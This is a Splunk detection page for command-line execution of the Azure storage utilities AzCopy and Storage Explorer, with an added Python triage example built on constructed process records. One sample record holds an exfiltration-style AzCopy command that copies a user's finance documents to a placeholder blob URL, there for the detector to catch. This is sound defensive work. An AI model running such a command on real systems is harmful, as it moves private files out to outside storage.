
Windows Azure Storage Utility Execution Via CLI

Splunk Security Content

Summary
Detects Windows endpoint activity in which the Azure Storage utilities AzCopy.exe and StorageExplorer.exe are executed from the command line. These tools perform large-scale data transfers to and from Azure Storage. Administrators use them legitimately, but they also give an intruder a conduit for data exfiltration that blends with normal traffic.

The analytic relies on endpoint telemetry from EDR and OS logs (for example Sysmon Event ID 1, Windows Security Event ID 4688 process creation, and CrowdStrike ProcessRollup2) to surface any process named AzCopy.exe or StorageExplorer.exe being spawned. It collects contextual attributes such as vendor_product, user, parent_process and path, together with the command-line arguments, so that legitimate operations can be distinguished from suspicious activity. Complete command lines, correct mapping to the Endpoint data model (Processes) and CIM normalization are required so that the results can be correlated with other detections.

Treat a match as anomalous and investigate it when it is paired with unusual parent-child process relationships, unexpected users, or atypical command-line patterns that indicate staging, copying, or exfiltrating data to cloud storage. The alert aims to identify potential compromise and data loss while keeping false positives low by focusing on process-level indicators of storage tooling rather than on network indicators alone.
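The logic described above, worked through as an added Python example (this is not Splunk's detection content and not the SPL of the analytic): raw process-creation records from three sources are normalized to a CIM-style Processes view, the two storage utilities are matched by process name, and each match is enriched with the contextual signals the summary lists (user, parent process, command line). The field names per source, the baseline of expected users and parents, and the sample records are all constructed for this example; the only values taken from the page are the two process names and the three telemetry sources.

```python
import ntpath
import re
import shlex
from dataclasses import dataclass

# Process names the analytic looks for (from the page).
STORAGE_TOOLS = {"azcopy.exe", "storageexplorer.exe"}

# Environment baseline. Assumed values for this example; a real deployment
# derives these from its own inventory of storage administrators and launchers.
KNOWN_ADMIN_USERS = {"corp\\storageadmin"}
EXPECTED_PARENTS = {"cmd.exe", "powershell.exe", "explorer.exe"}
TRANSFER_VERBS = {"copy", "sync"}  # azcopy subcommands that move data
AZURE_STORAGE_URL = re.compile(r"https://[^/\s\"]+\.(blob|file|dfs)\.core\.windows\.net", re.I)
LOCAL_PATH = re.compile(r"^[a-z]:\\", re.I)

# Simplified, assumed field names for Sysmon Event ID 1, Windows Security 4688
# and CrowdStrike ProcessRollup2; the real schemas carry more fields.
FIELD_MAPS = {
    "Sysmon": dict(dest="Computer", user="User", path="Image", parent="ParentImage", cmd="CommandLine"),
    "Windows Security": dict(dest="Computer", user="SubjectUserName", path="NewProcessName",
                             parent="ParentProcessName", cmd="CommandLine"),
    "CrowdStrike": dict(dest="ComputerName", user="UserName", path="ImageFileName",
                        parent="ParentBaseFileName", cmd="CommandLine"),
}


@dataclass
class ProcessEvent:
    """CIM Endpoint.Processes-style view of one process-creation record."""
    vendor_product: str
    dest: str
    user: str
    process_path: str
    parent_process_name: str
    process: str  # full command line

    @property
    def process_name(self) -> str:
        return ntpath.basename(self.process_path).lower()


@dataclass
class Finding:
    event: ProcessEvent
    reasons: list


def normalize(vendor_product: str, raw: dict) -> ProcessEvent:
    """Map a raw record from one source onto the common field names."""
    m = FIELD_MAPS[vendor_product]
    return ProcessEvent(vendor_product, raw[m["dest"]], raw[m["user"]].lower(), raw[m["path"]],
                        ntpath.basename(raw[m["parent"]]).lower(), raw[m["cmd"]])


def is_storage_tool(ev: ProcessEvent) -> bool:
    return ev.process_name in STORAGE_TOOLS


def arguments(ev: ProcessEvent) -> list:
    """Command-line tokens after the executable itself, with surrounding quotes removed."""
    tokens = shlex.split(ev.process, posix=False)  # non-POSIX keeps Windows backslashes intact
    if tokens and ntpath.basename(tokens[0].strip('"')).lower() == ev.process_name:
        tokens = tokens[1:]
    return [t.strip('"') for t in tokens]


def upload_shaped(args: list) -> bool:
    """True when the transfer reads a local path and writes to an Azure Storage URL."""
    positional = [a for a in args if not a.startswith("-")]
    if len(positional) >= 3 and positional[0].lower() in TRANSFER_VERBS:
        return bool(LOCAL_PATH.match(positional[1]) and AZURE_STORAGE_URL.search(positional[2]))
    return False


def risk_reasons(ev: ProcessEvent) -> list:
    """Contextual signals that turn a routine match into something to investigate."""
    reasons = []
    if ev.user not in KNOWN_ADMIN_USERS:
        reasons.append(f"unexpected user {ev.user}")
    if ev.parent_process_name not in EXPECTED_PARENTS:
        reasons.append(f"unusual parent process {ev.parent_process_name}")
    if upload_shaped(arguments(ev)):
        reasons.append("local path copied to an Azure Storage URL")
    return reasons


def triage(records) -> list:
    """Normalize, match on process name, and enrich every match."""
    return [Finding(ev, risk_reasons(ev)) for ev in (normalize(v, r) for v, r in records) if is_storage_tool(ev)]


# Constructed sample records; hostnames, users and paths are placeholders.
SAMPLE_RECORDS = [
    ("Sysmon", {"Computer": "wks-01", "User": "CORP\\storageadmin", "Image": r"C:\Tools\AzCopy.exe",
                "ParentImage": r"C:\Windows\System32\cmd.exe",
                "CommandLine": r'"C:\Tools\AzCopy.exe" copy "https://example.blob.core.windows.net/release/app.zip" "D:\staging\app.zip"'}),
    ("Windows Security", {"Computer": "wks-02", "SubjectUserName": "CORP\\jdoe",
                          "NewProcessName": r"C:\Users\jdoe\Downloads\AzCopy.exe",
                          "ParentProcessName": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                          "CommandLine": r'"C:\Users\jdoe\Downloads\AzCopy.exe" copy "C:\Users\jdoe\Documents\finance" "https://example.blob.core.windows.net/drop" --recursive'}),
    ("CrowdStrike", {"ComputerName": "wks-03", "UserName": "CORP\\storageadmin",
                     "ImageFileName": r"C:\Program Files\Microsoft Azure Storage Explorer\StorageExplorer.exe",
                     "ParentBaseFileName": "explorer.exe",
                     "CommandLine": r'"C:\Program Files\Microsoft Azure Storage Explorer\StorageExplorer.exe"'}),
    ("Sysmon", {"Computer": "wks-01", "User": "CORP\\jdoe", "Image": r"C:\Windows\System32\notepad.exe",
                "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe notes.txt"}),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"{f.event.vendor_product}: {f.event.process_name} on {f.event.dest} by {f.event.user}; reasons: {f.reasons or 'none'}")
```

Every execution of the two utilities is returned, matching the analytic's process-name scope; the `reasons` list is what an analyst would pivot on. The admin's download from cmd.exe and the Storage Explorer launch from explorer.exe come back with no reasons, while the copy of a user's Documents folder to a storage URL, run from an Office parent by a non-admin user, carries all three signals.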
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
  • Application Log
ATT&CK Techniques
  • T1567.002
Created: 2026-04-13